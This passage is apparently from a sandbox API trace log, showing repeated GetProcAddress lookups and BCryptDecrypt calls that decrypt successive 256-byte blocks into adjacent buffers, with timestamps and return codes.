lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.517] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062088, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062088, pcbResult=0x14f8fc) returned 0x0 [0178.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.520] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206217d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206217d, pcbResult=0x14f8fc) returned 0x0 [0178.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.522] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062272, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062272, pcbResult=0x14f8fc) returned 0x0 [0178.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.524] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062367, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062367, pcbResult=0x14f8fc) returned 0x0 [0178.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.526] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206245c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206245c, pcbResult=0x14f8fc) returned 0x0 [0178.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.529] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9f9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062551, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062551, pcbResult=0x14f8fc) returned 0x0 [0178.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.531] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9fad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062646, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062646, pcbResult=0x14f8fc) returned 0x0 [0178.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.534] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9fbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206273b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206273b, pcbResult=0x14f8fc) returned 0x0 [0178.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.536] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9fcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062830, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062830, pcbResult=0x14f8fc) returned 0x0 [0178.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.538] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9fdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062925, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062925, pcbResult=0x14f8fc) returned 0x0 [0178.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.540] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9fed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062a1a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062a1a, pcbResult=0x14f8fc) returned 0x0 [0178.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.687] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9ffd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062b0f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062b0f, pcbResult=0x14f8fc) returned 0x0 [0178.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.689] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea00d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062c04, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062c04, pcbResult=0x14f8fc) returned 0x0 [0178.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.691] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea01d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062cf9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062cf9, pcbResult=0x14f8fc) returned 0x0 [0178.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.693] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea02d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062dee, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062dee, pcbResult=0x14f8fc) returned 0x0 [0178.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.696] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea03d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062ee3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062ee3, pcbResult=0x14f8fc) returned 0x0 [0178.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.698] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea04d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2062fd8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2062fd8, pcbResult=0x14f8fc) returned 0x0 [0178.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.700] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea05d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20630cd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20630cd, pcbResult=0x14f8fc) returned 0x0 [0178.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.702] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea06d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20631c2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20631c2, pcbResult=0x14f8fc) returned 0x0 [0178.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.704] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea07d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20632b7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20632b7, pcbResult=0x14f8fc) returned 0x0 [0178.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.706] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea08d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20633ac, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20633ac, pcbResult=0x14f8fc) returned 0x0 [0178.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.708] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea09d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20634a1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20634a1, pcbResult=0x14f8fc) returned 0x0 [0178.710] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.710] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063596, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063596, pcbResult=0x14f8fc) returned 0x0 [0178.712] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.712] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206368b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206368b, pcbResult=0x14f8fc) returned 0x0 [0178.715] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.715] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063780, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063780, pcbResult=0x14f8fc) returned 0x0 [0178.717] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.717] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063875, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063875, pcbResult=0x14f8fc) returned 0x0 [0178.719] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.719] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206396a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206396a, pcbResult=0x14f8fc) returned 0x0 [0178.844] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.844] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea0fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063a5f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063a5f, pcbResult=0x14f8fc) returned 0x0 [0178.846] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.846] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea10d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063b54, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063b54, pcbResult=0x14f8fc) returned 0x0 [0178.848] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.848] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea11d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063c49, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063c49, pcbResult=0x14f8fc) returned 0x0 [0178.850] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.851] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea12d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063d3e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063d3e, pcbResult=0x14f8fc) returned 0x0 [0178.853] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.853] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea13d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063e33, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063e33, pcbResult=0x14f8fc) returned 0x0 [0178.855] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.855] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea14d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2063f28, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2063f28, pcbResult=0x14f8fc) returned 0x0 [0178.857] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.857] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea15d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206401d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206401d, pcbResult=0x14f8fc) returned 0x0 [0178.859] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.859] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea16d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064112, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064112, pcbResult=0x14f8fc) returned 0x0 [0178.861] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.861] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea17d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064207, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064207, pcbResult=0x14f8fc) returned 0x0 [0178.863] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.863] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea18d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20642fc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20642fc, pcbResult=0x14f8fc) returned 0x0 [0178.866] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.866] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea19d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20643f1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20643f1, pcbResult=0x14f8fc) returned 0x0 [0178.868] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.868] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20644e6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20644e6, pcbResult=0x14f8fc) returned 0x0 [0178.870] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.870] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20645db, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20645db, pcbResult=0x14f8fc) returned 0x0 [0178.872] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.872] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20646d0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20646d0, pcbResult=0x14f8fc) returned 0x0 [0178.875] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0178.875] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20647c5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20647c5, pcbResult=0x14f8fc) returned 0x0 [0178.878] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.044] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20648ba, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20648ba, pcbResult=0x14f8fc) returned 0x0 [0179.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.046] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea1fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20649af, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20649af, pcbResult=0x14f8fc) returned 0x0 [0179.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.049] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea20d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064aa4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064aa4, pcbResult=0x14f8fc) returned 0x0 [0179.051] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.051] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea21d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064b99, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064b99, pcbResult=0x14f8fc) returned 0x0 [0179.053] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.053] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea22d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064c8e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064c8e, pcbResult=0x14f8fc) returned 0x0 [0179.055] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.055] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea23d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064d83, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064d83, pcbResult=0x14f8fc) returned 0x0 [0179.057] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.057] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea24d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064e78, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064e78, pcbResult=0x14f8fc) returned 0x0 [0179.059] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.059] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea25d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2064f6d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2064f6d, pcbResult=0x14f8fc) returned 0x0 [0179.061] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.062] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea26d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065062, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065062, pcbResult=0x14f8fc) returned 0x0 [0179.063] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.063] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea27d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065157, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065157, pcbResult=0x14f8fc) returned 0x0 [0179.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.065] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea28d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206524c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206524c, pcbResult=0x14f8fc) returned 0x0 [0179.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.067] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea29d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065341, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065341, pcbResult=0x14f8fc) returned 0x0 [0179.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.070] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065436, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065436, pcbResult=0x14f8fc) returned 0x0 [0179.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.072] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206552b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206552b, pcbResult=0x14f8fc) returned 0x0 [0179.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.074] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065620, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065620, pcbResult=0x14f8fc) returned 0x0 [0179.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.076] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2065715, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2065715, pcbResult=0x14f8fc) returned 0x0 [0179.078] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.297] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x206580a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x206580a, pcbResult=0x14f8fc) returned 0x0 [0179.299] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0179.299] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1ea2fd0, 